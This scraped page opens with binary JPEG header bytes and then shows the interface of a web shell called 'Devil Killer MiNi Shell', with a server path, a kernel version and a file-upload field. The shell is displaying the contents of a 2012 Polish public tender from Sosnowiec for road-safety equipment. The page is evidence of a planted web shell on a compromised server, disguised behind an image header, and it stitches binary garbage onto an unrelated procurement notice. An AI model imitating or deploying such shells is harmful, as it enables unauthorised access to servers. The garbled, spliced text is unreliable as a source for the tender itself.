JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121228/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121228/531544-N-2012.html

<p class="kh_header"><b>Sosnowiec: dostawa (sprzedaż wraz z transportem):
I.	elementów bezpieczeństwa ruchu drogowego,
II.	progów zwalniających podrzutowych U16d wraz z montażem   na terenie       miasta Sosnowca,
III.  	stalowych barier ochronnych drogowych,
IV. 	oczek   aktywnych  kocie oczka LED,
V.	ogrodzeń dla pieszych
VI.	urządzeń zabezpieczających ruch pieszych i rowerzystów</b><br>
<b>Numer ogłoszenia: 531544 - 2012; data zamieszczenia: 28.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zakład Ulic i Mostów , ul. Plonów 22/I, 41-200 Sosnowiec, woj. śląskie, tel. 032 2917928, 2917922, 2917562, faks 032 2917960.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzuim.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa (sprzedaż wraz z transportem):
I.	elementów bezpieczeństwa ruchu drogowego,
II.	progów zwalniających podrzutowych U16d wraz z montażem   na terenie       miasta Sosnowca,
III.  	stalowych barier ochronnych drogowych,
IV. 	oczek   aktywnych  kocie oczka LED,
V.	ogrodzeń dla pieszych
VI.	urządzeń zabezpieczających ruch pieszych i rowerzystów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> dostawa (sprzedaż wraz z transportem):
I.	elementów bezpieczeństwa ruchu drogowego do 70 000,00 zł netto,
II.	progów zwalniających podrzutowych U16d wraz z montażem   na terenie       miasta Sosnowca do  10 000,00 zł netto,
III.  	stalowych barier ochronnych drogowych do 10 000,00 zł netto,
IV. 	oczek   aktywnych  kocie oczka  LED do 10 000,00 zł netto,
V.	ogrodzeń dla pieszych do  10 000,00 zł netto
VI.	urządzeń zabezpieczających ruch pieszych i rowerzystów do 10 000,00 zł netto..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.99.00.00-3, 34.99.60.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania ww. warunków dokonana zostanie na zasadzie spełnia -nie spełnia, poprzez szczegółową analizę treści oferty, w oparciu o informacje zawarte w dokumentach i oświadczeniach , które Wykonawca jest zobowiązany załączyć do oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania ww. warunków dokonana zostanie na zasadzie spełnia -nie spełnia, poprzez szczegółową analizę treści oferty, w oparciu o informacje zawarte w dokumentach i oświadczeniach , które Wykonawca jest zobowiązany załączyć do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania ww. warunków dokonana zostanie na zasadzie spełnia -nie spełnia, poprzez szczegółową analizę treści oferty, w oparciu o informacje zawarte w dokumentach i oświadczeniach , które Wykonawca jest zobowiązany załączyć do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania ww. warunków dokonana zostanie na zasadzie spełnia -nie spełnia, poprzez szczegółową analizę treści oferty, w oparciu o informacje zawarte w dokumentach i oświadczeniach , które Wykonawca jest zobowiązany załączyć do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzuim.sosnowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 41-200 Sosnowiec, ul. Plonów 22/I, pokój nr 15, I piętro lub w korespondencji elektronicznej biuro@mzuim.sosnowiec.pl..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.01.2013 godzina 12:45, miejsce: 41-200 Sosnowiec, ul. Plonów 22/I, pokój nr 23 - sekretariat, I piętro lub w korespondencji pocztowej.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> sprzedaż wraz z transportem ELEMENTÓW BEZPIECZEŃSTWA RUCHU DROGOWEGO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sprzedaż wraz z transportem ELEMENTÓW BEZPIECZEŃSTWA RUCHU DROGOWEGO o wartości do 70 000,00 zł netto.

Zgodnie z prawem opcji, Zamawiający gwarantuje zakup 50% podanej wyżej maksymalnej wartości elementów. Dostawa ponad gwarantowany próg zależna będzie od potrzeb Zamawiającego oraz dysponowania przez niego stosownymi środkami na podstawie budżetu miasta, przy czym nie zakupione przez Zamawiającego elementy ponad gwarantowaną ilość nie stanowią  podstaw do żadnych roszczeń Wykonawcy. Skorzystanie z prawa opcji nastąpi poprzez powiadomienie Wykonawcy o rozszerzeniu zamówienia w okresie trwania umowy i nie wymaga zmiany umowy zawartej w drodze przedmiotowego postępowania.

Urządzenia bezpieczeństwa ruchu zgodnie z załącznikiem nr 1 - 4 do Rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach poz. 2181 Dziennik Ustaw nr 220 z dnia 23 grudnia 2003 r: z późn. zm:
Urządzenia bezpieczeństwa ruchu typu U-3, U-4, U-5, U-9, U-20 oraz ich odmiany powinny być wykonane z blachy stalowej grubości 1,5mm ocynkowanej i malowanej proszkowo pokryte folią odblaskową 2.typu.
Urządzenia bezpieczeństwa ruchu z konstrukcją wsporczą powinny posiadać słupki 
O 60mm, odpowiedniej długości (zgodne z rozporządzeniem j.w.), uchwyty do zamocowania tarcz na tych słupkach oraz podstawy o masie 25 kg do każdego ze słupków by zapewnić stabilność konstrukcji wsporczej:
1.	LUSTRO DROGOWE (tłukące i nietłukące) U-18, wykonane z polimeru, akrylu odpowiednio
	O 900 mm  
	800x1000 mm
	przystosowane do montażu (z uchwytem) na słupkach :	
o przekroju O 50 - 60 mm 
	o przekroju kwadratowym 80 x 40 mm
2.	PACHOŁKI DROGOWE U-23 wykonane z materiału elastycznego - GUMY*,
	pokryte materiałem odblaskowym - biało - czerwone, o wymiarach :		
-	wysokość 50 cm				
U-23c				
	wraz z napisem MZUK Sosnowiec
*dopuszcza się inny niż guma materiał elastyczny (np. poliuretan).
3.	TAŚMA:
3.1.	OSTRZEGAWCZA U-22 biało-czerwona
3.2.	TAŚMA UNIEWAŻNIAJĄCA TREŚĆ ZNAKU - szer. 65,00 mm
4.	TABLICA 
4.1.	PROWADZĄCA POJEDYNCZA lub CIĄGŁA 	U-3 (a lub b i c lub d) z blachy ocynkowanej gr 1,5 mm, pokryta folią odblaskową II typu z kompletem mocowań: (z konstrukcją wsporczą) 2 słupki ocynkowane o 60 mm, wys. 1500 mm + 2 podstawy gumowe - 28 kg każda + komplet obejm:
-	długość 180 cm
-	długość 240 cm

4.2.	TABLICA ROZDZIELAJĄCA U-4 (a lub b) z blachy ocynkowanej gr 1,5 mm, pokryta folią odblaskową II typu z kompletem mocowań (bez konstrukcji wsporczej)
-	U-4b    500x750 mm

4.3.	TABLICA KIERUJĄCA 	U-21 (a lub b), 1-stronna lub 2-stronna z tworzyw sztucznych pokryta folią odblaskową II typu z kompletem mocowań: podstawa gumowa o masie 25-30 kg + komplet obejm.

5.	ZAPORA DROGOWA  wraz z konstrukcją  wsporczą:
5.1.	U-20a z blachy ocynkowanej gr 1,5 mm, pokryta folią odblaskową II typu z kompletem mocowań: 2 słupki ocynkowane o 60 mm, wys. 1000 mm + 2 podstawy gumowe - 19 kg każda + komplet obejm:
-	długość 225 cm

5.2.	U-20b z blachy ocynkowanej gr 1,5 mm, pokryta folią odblaskową II typu z kompletem mocowań: 2 słupki ocynkowane o 60 mm, wys. 1000 mm + 2 podstawy gumowe - 28 kg każda + komplet obejm:
-	długość 225 cm
6.	
6.1.	SŁUPEK PRZESZKODOWY U-5a zespolony, z tworzyw sztucznych, bez konstrukcji wsporczej; minimalna średnica przy wierzchołku 25 cm
6.2.	SŁUPEK PRZESZKODOWY U-5 a i b zespolony, z tworzyw sztucznych, dwustronny, ze znakami o średnicy O400 mm odblaskowy typu 2
6.3.	SŁUPEK BLOKUJĄCY U-12c o120mm, oklejony folią odblaskową typu 2

7.	Elementy bezpieczeństwa ruchu drogowego powinny posiadać odpowiednie atesty.
Zamawiający zastrzega sobie zamawianie w przypadkach uzasadnionych  innych elementów ruchu drogowego w ramach niniejszego postępowania, które będą rozliczane na podstawie cen jednostkowych Dostawcy.
8.	Dostawca jest zobowiązany do posiadania aprobaty technicznej zgodnie z wymaganiami zawartymi w Szczegółowych warunkach technicznych dla  urządzeń bezpieczeństwa ruchu drogowego i warunkach ich umieszczania na drogach, stanowiących Załącznik nr 2 do Rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie j.w. (Dz. U. nr 220/2003, poz.2181, pkt 1.3. z późn. zmianami)na niektóre elementy bezpieczeństwa ruchu drogowego, z wyłączeniem:
-	pachołków drogowych 
-	taśmy ostrzegawczej;
Aktualną na czas realizacji zamówienia APROBATĘ należy zamieścić w ofercie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.99.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PROGI ZWALNIAJĄCE PODRZUTOWE U16d WRAZ Z MONTAŻEM  NA 		      TERENIE MIASTA SOSNOWCA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PROGI ZWALNIAJĄCE PODRZUTOWE U16d WRAZ Z MONTAŻEM  NA 		      TERENIE MIASTA SOSNOWCA  o wartości do 10 000,00 zł netto:
Zgodnie z prawem opcji, Zamawiający gwarantuje zakup 30% podanej wyżej maksymalnej wartości elementów. Dostawa ponad gwarantowany próg zależna będzie od potrzeb Zamawiającego oraz dysponowania przez niego stosownymi środkami na podstawie budżetu miasta, przy czym nie zakupione przez Zamawiającego elementy ponad gwarantowaną ilość nie stanowią  podstaw do żadnych roszczeń Wykonawcy. Skorzystanie z prawa opcji nastąpi poprzez powiadomienie Wykonawcy o rozszerzeniu zamówienia w okresie trwania umowy i nie wymaga zmiany umowy zawartej w drodze przedmiotowego postępowania.
Progi zwalniające powinny:
1.	posiadać aprobatę techniczną IBDiM, 
2.	powinny być wykonane z  utwardzonego kauczuku lub tworzyw sztucznych (trwałych termoplastycznych lub chemoutwardzalnych materiałów) cechujących się dużą twardością i wysokimi własnościami elastycznymi oraz dużą odpornością mechaniczną
3.	wykonane w kolorystyce żółto-czarnej  z wbudowanymi elementami odblaskowymi III generacji
4.	montowane za pomocą elementów montażowych bezpośrednio do nawierzchni jezdni (śruby, kołki rozporowe, wzmocnienie profilem stalowym na całej długości itp.)
5.	odporne na działanie warunków atmosferycznych
zgodnie z wymaganiami zawartymi w Szczegółowych warunkach technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunkach ich umieszczania na drogach, stanowiących Załącznik nr 2 do Rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie j.w. (Dz. U. nr 220/2003, poz.2181, pkt 1.3. z późn. zmianami)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.99.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> sprzedaż wraz z transportem stalowych barier ochronnych drogowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sprzedaż wraz z transportem stalowych barier ochronnych drogowych o wartości do10 000,00 zł netto.
Zgodnie z prawem opcji, Zamawiający gwarantuje zakup 30% podanej wyżej maksymalnej wartości elementów. Dostawa ponad gwarantowany próg zależna będzie od potrzeb Zamawiającego oraz dysponowania przez niego stosownymi środkami na podstawie budżetu miasta, przy czym nie zakupione przez Zamawiającego elementy ponad gwarantowaną ilość nie stanowią  podstaw do żadnych roszczeń Wykonawcy Skorzystanie z prawa opcji nastąpi poprzez powiadomienie Wykonawcy o rozszerzeniu zamówienia w okresie trwania umowy i nie wymaga zmiany umowy zawartej w drodze przedmiotowego postępowania.
PODSTAWOWE WŁAŚCIWOŚCI:
a)	stalowa bariera ochronna drogowa skrajna i dzieląca typu SP oraz bariera mostowa i mostowa z barieroporęczą (komplet : bariera + słupki + śruby mocujące);
b)	bariera typu SP o profilu B i o rozstawie słupków co 4 m - SP - 09 i SP-10 oraz SP-06 i SP-06 z barieroporęczą o rozstawie słupków co 2 m (rysunek w załączeniu) z prowadnicą z profilowanej taśmy stalowej;
c)	wszystkie  elementy bariery powinny posiadać APROBATĘ TECHNICZNĄ IBDM..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.99.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> sprzedaż wraz z transportem OCZKA  AKTYWNE  KOCIE OCZKA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sprzedaż wraz z transportem OCZKA  AKTYWNE  KOCIE OCZKA  o wartości do 10 000,00 zł netto.
Przedmiotem tej części zamówienia jest zakup wraz z transportem punktowych elementów odblaskowych, oczek aktywnych LED, jako elementów aktywnego oznakowania dróg na terenie miasta Sosnowca.
Wymagania ogólne co do przedmiotu zamówienia:
- zasilanie solarne ( z wbudowaną baterią słoneczną ),
- kolor świecenia biały,
- średnica 140 - 160 mm,
- czas ładowania od 3 do 8 h,
- pulsacyjny tryb pracy,
- temperatura pracy od -40°c do +70°C,
- czas świecenia min 24 h,
- załączenie 100-350 lux,
- montowany równo z powierzchnią drogi.
Wykonawca na dostawę powyżej opisanych elementów udzieli 36 miesięcy gwarancji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.99.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> sprzedaż wraz z transportem OGRODZEń DLA PIESZYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sprzedaż wraz z transportem OGRODZEń DLA PIESZYCH o wartości do 10 000,00 zł netto.
Zgodnie z prawem opcji, Zamawiający gwarantuje zakup 40% podanej wyżej maksymalnej wartości elementów. Dostawa ponad gwarantowany próg zależna będzie od potrzeb Zamawiającego oraz dysponowania przez niego stosownymi środkami na podstawie budżetu miasta, przy czym nie zakupione przez Zamawiającego elementy ponad gwarantowaną ilość nie stanowią  podstaw do żadnych roszczeń Wykonawcy. Skorzystanie z prawa opcji nastąpi poprzez powiadomienie Wykonawcy o rozszerzeniu zamówienia w okresie trwania umowy i nie wymaga zmiany umowy zawartej w drodze przedmiotowego postępowania.
Przedmiotem zamówienia jest zakup, dostawa (sprzedaż wraz z dostawą do bazy Zamawiającego) ogrodzeń dla pieszych, należących do grupy urządzeń bezpieczeństwa ruchu drogowego U-12 segmentowych, ustawianych w celu: 
- ochrony pieszych i innych uczestników ruchu przed nieprawidłowymi zachowaniami oraz przed wodą i błotem rozpryskiwanym przez koła pojazdów,
- kanalizowania ruchu pieszych na niektórych ciągach komunikacyjnych,
spełniających niżej wskazane wymagania.

Ogrodzenia  - pojedynczy moduł składa się z:

1.	panelu o wym. 105 cm x 200 cm z prętów stalowych walcowanych, spełniających wymagania:
-normy PN-EN 10017:2006 i PN-EN 10025-1:2007 ze stali S235 JR, S235JRH 
lub 
- normy PN-EN 10027-1:1994 ze stali S235JRG2
poziomych drutów O7 mm - rozstaw co 243 mm i pionowych O5 mm - rozstaw co 50mm zgrzewanych pod kątem prostym, połączonych ze słupkami i przykrytych od góry podchwytem z ceownika stalowego giętego na zimno spełniającego wymagania:
	-normy PN-EN 10162:2005 i PN-EN 10025-2:2007 ze stali S235JR, S235JRH 
lub 
- normy PN-EN 10027-1:1994 ze stali S235JRG2
2.	słupka pionowego: dł. 1500 mm, wykonanego z zamkniętego kształtownika stalowego 50 x 50 x 2 mm o przekroju kwadratowym; spełniającego wymagania: 
-normy PN-EN 10219-1 i 2:2007 ze stali S235JR, S235JRH 
lub 
- normy PN-EN 10027-1:1994 ze stali S235JRG2
w górnej części wyposażone są w przyspawany wieszak, na którym zawieszany jest panel ogrodzenia; słupek mocowany jest w fundamencie betonowym, w przypadku montowania kołkami stalowymi do podłoża betonowego/bitumicznego słupek powinien być wyposażony w dospawaną podstawę z płyty stalowej o wym. 140x140x4mm lub kotwę o dł. 150 mm.

3.	maskownicy wykonanej z ceownika stalowego o wym. 30x50x2 mm, giętego na zimno spełniającego wymagania:
	-normy PN-EN 10162:2005 i PN-EN 10025-2:2007 ze stali S235JR, S235JRH 
lub 
- normy PN-EN 10027-1:1994 ze stali S235JRG2,
mocowanej pionowo za pomocą śrub do słupka, mającej za zadanie ukrycie elementów połączeń, usztywnienie wszystkich elementów, uniemożliwienie odkształcenia pojedynczych przęseł, umożliwienie szybkiego demontażu bariery
